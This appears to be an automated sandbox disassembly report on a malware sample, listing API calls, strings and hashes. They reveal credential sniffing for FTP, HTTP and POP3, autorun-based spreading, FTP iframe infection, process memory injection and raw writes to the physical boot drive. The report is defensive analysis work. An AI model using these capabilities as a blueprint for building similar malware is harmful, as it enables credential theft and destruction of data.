                                                                  • Opcode ID: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction ID: ae33d40cb3c9f804d6ae86217e78cba11e3a34fd54cb6a107b73e1e2973193cc
                                                                  • Opcode Fuzzy Hash: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction Fuzzy Hash: 7DD05B316006145BC910A66AE4418DA739CDE4E3787044157FE1CD77E3C775AC8046D9
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: gethostbynameinet_addr
                                                                  • String ID: n"6
                                                                  • API String ID: 1594361348-3573607553
                                                                  • Opcode ID: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction ID: e8c26bcdf85450cc084ac2633105e1a7ec7037625707314cc3f2bf934bc786bf
                                                                  • Opcode Fuzzy Hash: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction Fuzzy Hash: 74D05B356009149B4911A669E4409D9739CDE4A3747158157FA1CCF7A2C735AC4056D5
                                                                  APIs
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,003A9E78,00000026,00000001), ref: 003668BB
                                                                  • PathAppendW.SHLWAPI(003A9E78,Internet Explorer\iexplore.exe), ref: 003668D0
                                                                  Strings
                                                                  • Internet Explorer\iexplore.exe, xrefs: 003668C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendFolderSpecial
                                                                  • String ID: Internet Explorer\iexplore.exe
                                                                  • API String ID: 2921508639-3330628412
                                                                  • Opcode ID: 3ea1eb32441de1f6822909183518b3694f0847cfda58279a30d710a2fcd06206
                                                                  • Instruction ID: e58eba9f132c0b64d11af64085038cf2e9ac7c35f62447fce830dc547dc89bac
                                                                  • Opcode Fuzzy Hash: 3ea1eb32441de1f6822909183518b3694f0847cfda58279a30d710a2fcd06206
                                                                  • Instruction Fuzzy Hash: B8C0122A3C038026EB335B284C8BFD13295E76BF82F808511F50AFD0D2C7D544805202

                                                                  Execution Graph

                                                                  Execution Coverage:3.7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:203
                                                                  Total number of Limit Nodes:12

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,003D4E7E,SeDebugPrivilege,00000001,00000000,ntdll.dll,NtGetNextProcess), ref: 003D4C32
                                                                  • GetLastError.KERNEL32 ref: 003D4C3C
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 003D4C52
                                                                  • GetLastError.KERNEL32 ref: 003D4C5C
                                                                  • CloseHandle.KERNEL32(?), ref: 003D4C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CloseHandleLookupOpenPrivilegeProcessTokenValue
                                                                  • String ID:
                                                                  • API String ID: 1673749002-0
                                                                  • Opcode ID: 9eae95835072d7f88a973244ad74375d99e648a385a53da4b5d2c2604a7e9c3a
                                                                  • Instruction ID: 3b92875d432688f47ec62d7f8fad052c78aede0cf35a3a6f2f8b3886cd71c0a9
                                                                  • Opcode Fuzzy Hash: 9eae95835072d7f88a973244ad74375d99e648a385a53da4b5d2c2604a7e9c3a
                                                                  • Instruction Fuzzy Hash: 4C117375A10208ABDB21DBE4ED49FAEB7BCEB49701F404649FE09DB280DA719D048761

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • strncpy.MSVCRT(EDB88F28,00010000,00000104,EDB88320,00000000,00000D10,?,00000000), ref: 003D4B1A
                                                                  • sprintf.MSVCRT(?,-%sMutex,00010000,EDB88F28,00010000,00000104,EDB88320,00000000,00000D10,?,00000000), ref: 003D4B2C
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4B3F
                                                                  • _snprintf.MSVCRT(?,00000104,%s_0,00010000,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4B6F
                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4B85
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4B97
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4BE3
                                                                  • ReleaseMutex.KERNEL32(?,?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4C02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Mutex$CloseCreateFileHandleMappingObjectOpenReleaseSingleWait_snprintfsprintfstrncpy
                                                                  • String ID: %s_0$-%sMutex
                                                                  • API String ID: 4144850300-892854768
                                                                  • Opcode ID: 7a3f03325285fb515feacb0eba1ab88f250f10124d92d6b500174a37f108be26
                                                                  • Instruction ID: ccfb524271fa29ec5516bde7ed3b646fafc8fa890704194df9f7af6f11b4a965
                                                                  • Opcode Fuzzy Hash: 7a3f03325285fb515feacb0eba1ab88f250f10124d92d6b500174a37f108be26
                                                                  • Instruction Fuzzy Hash: 0D312CB26002446BD721DF65FC81FDA77AC9F54710F04465BFD899B280EBB1D9848690

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005070,00000000,00000000,00000000), ref: 003D5C03
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D5C0A
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000050F0,00000000,00000000,00000000), ref: 003D5C3D
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D5C44
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleThread
                                                                  • String ID: LdrLoadDll$NtResumeThread$ntdll.dll
                                                                  • API String ID: 3032276028-1814628691
                                                                  • Opcode ID: 1904ec680757041d3d3c76c443b6ca2457345210af6d8384818ee27831ce4cae
                                                                  • Instruction ID: 0b689bcf191e0d56884bc566a038f67bac7e5eea288d365d2c188f22a5ac007a
                                                                  • Opcode Fuzzy Hash: 1904ec680757041d3d3c76c443b6ca2457345210af6d8384818ee27831ce4cae
                                                                  • Instruction Fuzzy Hash: 6861C276B40B12ABD722DF69EC81F6673A4BF44705F19462AE801EB781DB70F901CB94

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NtGetNextProcess$SeDebugPrivilege$ntdll.dll
                                                                  • API String ID: 0-503679825
                                                                  • Opcode ID: 5656a5c900e727bf9bcc59d0f0a1b90ce46cfdc831844284d81a52fb9108cc60
                                                                  • Instruction ID: 5f4df8b93ff072242dd5400ff2ced71cedcee5725f03e941c7bddaabf10b764c
                                                                  • Opcode Fuzzy Hash: 5656a5c900e727bf9bcc59d0f0a1b90ce46cfdc831844284d81a52fb9108cc60
                                                                  • Instruction Fuzzy Hash: A331CAB6F4421476D611BB75BD07FAE32589B44700F004566F844BB3C2EAB96A40C7AB

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32(?,?,00000000,00000010,?), ref: 003D2FD2
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,00000020,?), ref: 003D301C
                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000000,00000020), ref: 003D3036
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,00000000,00000004,00000020), ref: 003D3053
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcess$Write$Read
                                                                  • String ID:
                                                                  • API String ID: 2454571318-3916222277
                                                                  • Opcode ID: 69f1daaa7fd8d3f9ed07d2cbd1e46a4c6f3f7ca615fcb3ce0b166a4377613ab4
                                                                  • Instruction ID: e8e297a8ca37f5f6ceb3f8da02a6e275c7e161c783b05ca9a5a768d57a37ab86
                                                                  • Opcode Fuzzy Hash: 69f1daaa7fd8d3f9ed07d2cbd1e46a4c6f3f7ca615fcb3ce0b166a4377613ab4
                                                                  • Instruction Fuzzy Hash: 18314DB260050DABDB12DE99EC81EEFB37CEB40750F11416AE90696244E771AF46C7A2

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _snprintf.MSVCRT(?,00000104,%s_%d,EDB88F28,00000000), ref: 003D44A7
                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 003D44BD
                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 003D44F0
                                                                  • CloseHandle.KERNEL32(?), ref: 003D451B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandleMappingOpenView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 460513966-1933919280
                                                                  • Opcode ID: fd7ef295c2662f94c463f328986799a26032d8f619bdb34b82d36f73aa8f7f6c
                                                                  • Instruction ID: e69c4309028f2da4d8288bfaec0a1655f1dfdbe9abbcd7a8493218098efb5d20
                                                                  • Opcode Fuzzy Hash: fd7ef295c2662f94c463f328986799a26032d8f619bdb34b82d36f73aa8f7f6c
                                                                  • Instruction Fuzzy Hash: FF21A4B26507068BD332CF18ED89B72B3E9EB84304F44867DE7469B285D779B860DB40
APIs
• memset.MSVCRT(?,00000000,000003FF), ref: 003DB4A2
  • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
  • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
  • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D7431
  • Part of subcall function 003D73E0: _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
  • Part of subcall function 003D73E0: _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
  • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D747A
• lstrcpyA.KERNEL32(?,003E1335), ref: 003DB51A
• HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB536
• GetVersionExA.KERNEL32(?), ref: 003DB550
• lstrcpyA.KERNEL32(?,ERR), ref: 003DB5F5
• HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB60D
• strstr.MSVCRT(?,<br>), ref: 003DB641
• lstrlenA.KERNEL32(00000000), ref: 003DB650
• lstrlenA.KERNEL32(-00000004), ref: 003DB65F
• GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 003DB67D
• lstrcmpA.KERNEL32(-00000004,003E2BE4), ref: 003DB6A8
• GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 003DB6C5
• lstrcpyA.KERNEL32(?,00000000), ref: 003DB719
• HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB74A
  • Part of subcall function 003D1BA0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 003D1BC5
• HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB75B
• HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB76E
• HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB781
• _snprintf.MSVCRT(?,00000104,00000000), ref: 003DB796
• _snprintf.MSVCRT(?,00000104,00000000,?,00000104,00000000), ref: 003DB7AB
• lstrcpyA.KERNEL32(?,003E2C0C), ref: 003DB7CD
• _snprintf.MSVCRT(00000000,00000104,n%s[%s{%s%s{%s,?,?,00000000,?,00000000), ref: 003DB7FC
• _snprintf.MSVCRT(?,00000104,00000000,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000,00000000,00000104), ref: 003DB863
• _snprintf.MSVCRT(?,00000104,00000000,?,00000104,00000000,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 003DB878
• lstrcpyA.KERNEL32(?,003E2C0C), ref: 003DB89A
• _snprintf.MSVCRT(00000000,00000104,n%s[%s{%s%s{%s,?,?,00000000,?,00000000), ref: 003DB8C9
• _snprintf.MSVCRT(?,00000104,[%s{%s%s{%s,?,00000000,?,00000000), ref: 003DB8E0
• ??3@YAXPAX@Z.MSVCRT(?), ref: 003DB8F3
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: _snprintf$AllocHeap$lstrcpy$lstrlen$memset$InfoLocaleTime$??3@FileSystemVersion_vsnprintflstrcmpstrstr
• String ID: 2K3$2K8$<br>$ERR$VIS$[%s{%s%s{%s$admin$http://api.wipmania.com/$isadmin$n%s[%s{%s%s{%s
• API String ID: 124843797-3058427118
APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 003D1ECD
• GetLastError.KERNEL32 ref: 003D1EDA
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 003D1EF5
• GetLastError.KERNEL32 ref: 003D1EFF
• CloseHandle.KERNEL32(00000000), ref: 003D1F06
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: ErrorLast$AcquireCloseContextCreateCryptFileHandle
• String ID:
• API String ID: 2213256293-0
APIs
• memset.MSVCRT(?,00000000,00000105), ref: 003DF150
• memset.MSVCRT(?,00000000,00000103,?,00000000,00000105), ref: 003DF168
• lstrcpyA.KERNEL32(?,?), ref: 003DF17B
  • Part of subcall function 003DEDF0: memset.MSVCRT(?,00000000,00000103), ref: 003DEE0E
  • Part of subcall function 003DEDF0: vsprintf.MSVCRT(00000000,?,?,?,00000000,00000103), ref: 003DEE22
  • Part of subcall function 003DEDF0: PathAppendA.SHLWAPI(?,00000000), ref: 003DEE35
• SetCurrentDirectoryA.KERNEL32(?), ref: 003DF196
• FindFirstFileA.KERNEL32(?,?), ref: 003DF1AA
• CoInitialize.OLE32(00000000), ref: 003DF1C2
• _snprintf.MSVCRT(?,00000103,%s%s,?,?), ref: 003DF1E1
• FindNextFileA.KERNEL32(?,?), ref: 003DF20C
• strncmp.MSVCRT(?,RECYCLED,00000008), ref: 003DF22E
• strstr.MSVCRT(?,.inf), ref: 003DF246
• _snprintf.MSVCRT(?,00000103,%s%s,?,?), ref: 003DF26B
• FindNextFileA.KERNEL32(?,?), ref: 003DF290
• FindClose.KERNEL32(?), ref: 003DF29E
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: Find$Filememset$Next_snprintf$AppendCloseCurrentDirectoryFirstInitializePathlstrcpystrncmpstrstrvsprintf
• String ID: %s%s$.inf$RECYCLED
• API String ID: 3870971729-188919753
APIs
• VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 003D9DA7
• CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,20000080,00000000), ref: 003D9DD5
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: AllocCreateFileVirtual
• String ID: \\.\PHYSICALDRIVE0
• API String ID: 1475775534-1557481562
APIs
• memset.MSVCRT(?,00000000,000001FF), ref: 003D9EDF
• CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 003D9F16
• DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 003D9F45
• WriteFile.KERNEL32(00000000,00000000,00000200,?,00000000), ref: 003D9F5A
• DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 003D9F74
• CloseHandle.KERNEL32(00000000), ref: 003D9F77
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: ControlDeviceFile$CloseCreateHandleWritememset
• String ID: 00100$U$\\.\PHYSICALDRIVE0
• API String ID: 3939175881-3482488017
APIs
• OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,NtShutdownSystem), ref: 003DA57A
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 003DA58F
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 003DA5B3
• GetLastError.KERNEL32 ref: 003DA5B9
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: Token$AdjustErrorLastLookupOpenPrivilegePrivilegesProcessValue
• String ID: NtShutdownSystem$SeShutdownPrivilege$ntdll.dll
• API String ID: 137217592-1699316426
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph: function at 3dd7a0 (graph image not reproduced; executed and not-executed basic blocks are distinguished in the original rendering)
APIs
• HeapAlloc.KERNEL32(?,00000008,00000800), ref: 003DD7C3
• HeapAlloc.KERNEL32(?,00000008,00000800), ref: 003DD7D2
• memset.MSVCRT(?,00000000,00000103), ref: 003DD7EE
• HeapFree.KERNEL32(?,?,00000000), ref: 003DD80B
• HeapFree.KERNEL32(?,00000000,00000000), ref: 003DD819
• GetLastError.KERNEL32 ref: 003DD82F
• HeapFree.KERNEL32(?,00000000,00000000), ref: 003DD83C
• GetLastError.KERNEL32 ref: 003DD852
• HeapFree.KERNEL32(?,00000000,00000000), ref: 003DD85B
• ReadFile.KERNEL32(?,00000000,00000800,00000000,00000000), ref: 003DD87A
• atoi.MSVCRT(00000000), ref: 003DD8D3
• strchr.MSVCRT(00000000,0000002E), ref: 003DD8E8
• lstrlenA.KERNEL32(30e44aa1), ref: 003DD900
• HeapAlloc.KERNEL32(?,00000008,00000001), ref: 003DD924
• HeapAlloc.KERNEL32(?,00000008,00000001), ref: 003DD930
• strchr.MSVCRT(00000000,0000002E), ref: 003DD93F
• lstrlenA.KERNEL32(00000000), ref: 003DD952
• lstrcpynA.KERNEL32(00000000,00000001,00000000), ref: 003DD95E
• lstrcpynA.KERNEL32(?,00000000,00000001), ref: 003DD96D
• lstrcmpA.KERNEL32(?,ftplog), ref: 003DD97F
Strings
Memory Dump Source
• Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
Similarity
• API ID: Heap$AllocFree$ErrorLastlstrcpynlstrlenstrchr$FileReadatoilstrcmpmemset
• String ID: 0W>$30e44aa1$4W>$8W>$<W>$@W>$FTP -> $POP3 -> $[DNS]: Blocked DNS "%s"$[FTP Infect]: %s was iframed$[FTP Login]: %s$[HTTP Login]: %s$[HTTP Traffic]: %s$[HTTP]: %s$[MSN]: %s$[PDef+]: %s$[POP3 Login]: %s$[Ruskill]: Detected DNS: "%s"$[Ruskill]: Detected File: "%s"$[Ruskill]: Detected Reg: "%s"$blk$block$disable$dns$ftpinfect$ftplog$httplogin$httpspread$httptraff$msn$poplog$rdns$rreg$ruskill
• API String ID: 1531277263-1463491000

Control-flow Graph: function at 3e0430 (graph image not reproduced; executed and not-executed basic blocks are distinguished in the original rendering)
APIs
• lstrlenA.KERNEL32(?,00000000,00000000,756F59EB), ref: 003E0446
• GetProcessHeap.KERNEL32(00000008,00000001), ref: 003E044C
• HeapAlloc.KERNEL32(00000000), ref: 003E0453
• memset.MSVCRT(?,00000000,00000103), ref: 003E048B
• GetProcessHeap.KERNEL32 ref: 003E0493
• lstrcpyA.KERNEL32(00000000,?), ref: 003E04A9
• sscanf.MSVCRT(00000000,SDG %d,?), ref: 003E04C5
• strstr.MSVCRT(00000000,X-MMS-IM-Format: ), ref: 003E04DC
• lstrlenA.KERNEL32(003D2780), ref: 003E04F0
• lstrlenA.KERNEL32(?), ref: 003E04FA
• HeapAlloc.KERNEL32(?,00000008,00000000), ref: 003E0505
• strtok.MSVCRT(00000000,003E2B84), ref: 003E051B
• lstrcpyA.KERNEL32(00000000,003E1335), ref: 003E0534
• _memicmp.MSVCRT(00000000,Content-Length: ,00000010), ref: 003E0557
• lstrlenA.KERNEL32(003D2780), ref: 003E0567
• _snprintf.MSVCRT(?,00000103,Content-Length: %d,00000000), ref: 003E057B
• _memicmp.MSVCRT(00000000,From: ,00000006), ref: 003E0596
• lstrcatA.KERNEL32(00000000,00000000), ref: 003E05A7
• lstrcatA.KERNEL32(00000000,00000000), ref: 003E05F1
• lstrcatA.KERNEL32(00000000,003E2B84), ref: 003E05F9
• strtok.MSVCRT(00000000,003E2B84), ref: 003E0602
• lstrcatA.KERNEL32(00000000,00000000), ref: 003E061C
• lstrcatA.KERNEL32(00000000,), ref: 003E0624
• lstrcatA.KERNEL32(00000000,003D2780), ref: 003E062B
• lstrlenA.KERNEL32(00000000), ref: 003E062E
• _snprintf.MSVCRT(?,00000103,SDG %d %d,?,00000000), ref: 003E0646
• lstrlenA.KERNEL32(00000000), ref: 003E064F
• lstrlenA.KERNEL32(?), ref: 003E065A
• HeapAlloc.KERNEL32(?,00000008,00000040), ref: 003E0667
• _snprintf.MSVCRT(00000000,0000003F,%s%s,?,00000000), ref: 003E0688
• sscanf.MSVCRT(00000000,MSG %d %1s,?,?), ref: 003E06A0
• strstr.MSVCRT(00000000,003E2B84), ref: 003E06B7
• strstr.MSVCRT(-00000002,), ref: 003E06D2
• lstrlenA.KERNEL32(00000000), ref: 003E06E6
• lstrlenA.KERNEL32(-00000002), ref: 003E06F3
• HeapAlloc.KERNEL32(?,00000008,?), ref: 003E06FF
• lstrlenA.KERNEL32(00000000), ref: 003E0714
• lstrlenA.KERNEL32(-00000002), ref: 003E0721
• lstrcpynA.KERNEL32(?,-00000002,?), ref: 003E072C
• lstrlenA.KERNEL32(?), ref: 003E0736
• lstrlenA.KERNEL32(003D2780), ref: 003E073E
• HeapAlloc.KERNEL32(?,00000008,?), ref: 003E074B
• lstrlenA.KERNEL32(?,?,003D2780), ref: 003E0761
• lstrlenA.KERNEL32(003D2780), ref: 003E076A
• _snprintf.MSVCRT(?,?,MSG %d %s %d%s%s,?,?,00000004), ref: 003E0787
• HeapFree.KERNEL32(?,00000000,00000000), ref: 003E079F
• HeapFree.KERNEL32(?,00000000,?), ref: 003E07AC
• HeapFree.KERNEL32(?,00000000,00000000), ref: 003E07B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$Alloc$_snprintf$Freestrstr$Process_memicmplstrcpysscanfstrtok$lstrcpynmemset
                                                                  • String ID: $%s%s$Content-Length: $Content-Length: %d$From: $MSG %d %1s$MSG %d %s %d%s%s$Reliability: $SDG $SDG $SDG %d$SDG %d %d$X-MMS-IM-Format:
                                                                  • API String ID: 375969099-2909086048
                                                                  • Opcode ID: 8e4aaa25985d45d3c9f33ae9983cd7aa8fc701ffcb7b115daf8045c5c1e477cb
                                                                  • Instruction ID: f75678f3bf4e7efd488b6e5a5bde3193d2a1c1f32a94ec1262152e95b8d4ec40
                                                                  • Opcode Fuzzy Hash: 8e4aaa25985d45d3c9f33ae9983cd7aa8fc701ffcb7b115daf8045c5c1e477cb
                                                                  • Instruction Fuzzy Hash: 54A141B5A00269BBDB16DBA68C85EFF777CEB48700F044655F904A72C1EAB4DE408B60
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003DF459
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DF472
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,00000103), ref: 003DF48B
                                                                  • memset.MSVCRT(?,00000000,000003FF,?,00000000,00000103,?,00000000,00000103), ref: 003DF4A4
                                                                  • memset.MSVCRT(?,00000000,000003FF,?,00000000,000003FF,?,00000000,00000103,?,00000000,00000103), ref: 003DF4BD
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,000003FF,?,00000000,000003FF,?,00000000,00000103,?,00000000,00000103), ref: 003DF4D6
                                                                  • memset.MSVCRT ref: 003DF4F2
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DF50B
                                                                  • memset.MSVCRT(?,00000000,0000040E,?,00000000,00000103), ref: 003DF526
                                                                  • memset.MSVCRT(?,00000000,0000040E,?,00000000,0000040E,?,00000000,00000103), ref: 003DF541
                                                                  • memset.MSVCRT(?,00000000,00000206,?,00000000,0000040E,?,00000000,0000040E,?,00000000,00000103), ref: 003DF55C
                                                                  • sprintf.MSVCRT(?,%sautorun.inf,?,?,00000000,00000206,?,00000000,0000040E,?,00000000,0000040E,?,00000000,00000103), ref: 003DF571
                                                                  • sprintf.MSVCRT(?,%sautorun.tmp,?), ref: 003DF586
                                                                  • wsprintfW.USER32(?,003E3018,?,?,%sautorun.tmp,?), ref: 003DF5A4
                                                                  • sprintf.MSVCRT(?,%s\%s,0041BDB0,0041BEB4), ref: 003DF5BC
                                                                  • sprintf.MSVCRT(?,%s%s,?,0041BDB0,?,%s\%s,0041BDB0,0041BEB4), ref: 003DF5D3
                                                                  • sprintf.MSVCRT(?,%s%s,?,?,?,%s%s,?,0041BDB0,?,%s\%s,0041BDB0,0041BEB4), ref: 003DF5EC
                                                                  • wsprintfW.USER32(?,003E3018,?), ref: 003DF607
                                                                  • wsprintfW.USER32(?,%S%S\Desktop.ini,?,0041BDB0), ref: 003DF61B
                                                                    • Part of subcall function 003D1CF0: GetFileAttributesW.KERNEL32(?), ref: 003D1CF7
                                                                  • _stricmp.MSVCRT(00000000,ERR), ref: 003DF64B
                                                                  • _stricmp.MSVCRT(0041A920,00000000), ref: 003DF65D
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 003DF684
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 003DF692
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 003DF6A0
                                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 003DF6AA
                                                                  • GetLastError.KERNEL32 ref: 003DF6B4
                                                                  • CopyFileW.KERNEL32(0041B9A0,?,00000000), ref: 003DF6CE
